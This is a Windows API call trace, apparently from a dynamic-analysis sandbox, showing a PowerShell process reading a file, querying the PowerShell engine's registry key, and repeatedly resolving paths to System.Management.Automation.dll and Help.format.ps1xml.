	[0411.267] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.267] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.268] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.268] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.268] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.268] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.268] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.268] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.269] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0xf37, lpOverlapped=0x0) returned 1
	[0411.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x301a98f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301a98f*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0411.271] ReadFile (in: hFile=0x2fc, lpBuffer=0x301b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x301b2f0*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0411.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.271] SetErrorMode (uMode=0x1) returned 0x1
	[0411.271] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0411.271] SetErrorMode (uMode=0x1) returned 0x1
	[0411.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.271] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0411.271] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0411.271] CoTaskMemAlloc (cb=0x5a) returned 0x3ba940
	[0411.271] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x3ba940, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0411.271] CoTaskMemFree (pv=0x3ba940) 
	[0411.272] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.275] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xe2ba433, Data2=0x6a13, Data3=0x49f7, Data4=([0]=0xbf, [1]=0xca, [2]=0xfc, [3]=0x89, [4]=0xcd, [5]=0x13, [6]=0xd6, [7]=0xcd))) returned 0x0
	[0411.275] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3f9c773d, Data2=0x9472, Data3=0x4199, Data4=([0]=0x9c, [1]=0x9e, [2]=0xfb, [3]=0xa6, [4]=0x17, [5]=0x60, [6]=0xb9, [7]=0x6d))) returned 0x0
	[0411.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.933] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x6babcf88, Data2=0x46d7, Data3=0x4816, Data4=([0]=0x98, [1]=0x85, [2]=0x74, [3]=0x8a, [4]=0xcd, [5]=0x62, [6]=0x4c, [7]=0x70))) returned 0x0
	[0411.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.937] VirtualQuery (in: lpAddress=0x20b420, lpBuffer=0x20c2e0, dwLength=0x30 | out: lpBuffer=0x20c2e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.938] VirtualQuery (in: lpAddress=0x20b4b0, lpBuffer=0x20c370, dwLength=0x30 | out: lpBuffer=0x20c370*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.940] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.941] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
